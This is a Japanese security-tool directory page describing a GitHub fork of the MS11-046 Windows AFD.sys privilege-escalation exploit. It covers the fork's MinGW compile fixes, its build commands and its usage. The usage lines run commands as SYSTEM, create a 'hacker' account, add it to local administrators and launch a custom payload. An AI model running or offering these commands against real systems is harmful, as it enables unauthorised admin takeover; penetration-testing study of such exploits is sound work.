Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
特権昇格ペイロード生成脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) AFD 特権昇格 — MinGW クロスコンパイル修正 + カスタムコマンドサポート

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ms11-046-mingw

CVE-2011-1249 / MS11-046 — Windows x86向けAFD.sys権限昇格エクスプロイト。

オリジナルのエクスプロイトはTomislav Paskalev氏によるものです (EDB-40564)。このフォークはMinGWのクロスコンパイルエラーを修正し、argv[1]によるカスタムコマンド実行を追加します。


オリジナルからの変更点

#変更理由
1FARPROC ZwQuerySystemInformation → 型付き関数ポインタ (pZwQuerySystemInformation)MinGWの厳密な型チェックは、ゼロ引数のFARPROCを引数付きで呼び出すことを拒否するため — too many arguments to function でコンパイルが失敗します
2securityPatches[] 配列を static に変更if/else ブロック内で宣言された配列はスタックに割り当てられてスコープ外になるため、static がないとポインタが宙吊りになります
3argv[1] によるカスタムコマンドハードコードされた cmd.exe の代わりに、任意のコマンドをSYSTEMとして実行します

問題

MinGWでオリジナルをコンパイルすると失敗します:

root@kitploit:~
ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC はゼロ個の引数で宣言された汎用関数ポインタです。MinGWは厳密な型チェックを強制するため、引数を渡して呼び出すと拒否されます。修正方法は、正しいシグネチャを持つ型付き関数ポインタを使用することです。

プリコンパイル済みバイナリは存在しますが(例: SecWiki/windows-kernel-exploits)、カスタムコマンドには対応していません。


Linuxでのクロスコンパイル (MinGW)

root@kitploit:~
sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

使用方法

root@kitploit:~
ms11-046.exe                                             # default: spawns cmd.exe as SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # add a user as SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # add to local admins
ms11-046.exe "c:\windows\temp\shell.exe"                 # run a custom payload as SYSTEM

参考リンク

  • MS11-046 — Microsoft セキュリティ情報
  • CVE-2011-1249 - 米国国家脆弱性データベース
  • EDB-40564 — オリジナルエクスプロイト
ツールをダウンロード